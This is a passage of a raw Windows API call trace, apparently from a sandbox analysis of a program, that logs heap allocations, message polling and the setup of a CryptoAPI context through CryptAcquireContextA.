[0248.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0248.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0248.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0248.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0248.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0248.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0248.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0248.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0248.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0248.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0248.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0248.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0248.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0248.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0248.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0248.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0248.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0248.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0248.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0248.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0248.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0248.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0248.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0248.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0248.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0248.850] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0248.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0248.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0248.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0248.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0248.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0248.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0248.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0248.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b28 [0248.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0248.851] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0248.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0248.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0248.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0248.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0248.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0248.852] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0248.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0248.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0248.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0248.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0248.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0248.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0248.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0248.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.855] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.855] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0248.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0248.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0248.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.855] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0248.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0248.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.856] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0248.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0248.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0248.857] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.857] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0248.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0248.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0248.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0248.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.857] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.894] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0248.894] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0248.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0248.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0248.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.894] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.895] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0248.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0248.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.895] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0248.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0248.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0248.895] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0248.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0248.896] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.896] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0248.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0248.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0248.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.896] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0248.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0248.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0248.896] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0248.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0248.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0248.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0248.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0248.896] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0248.897] CharUpperBuffW 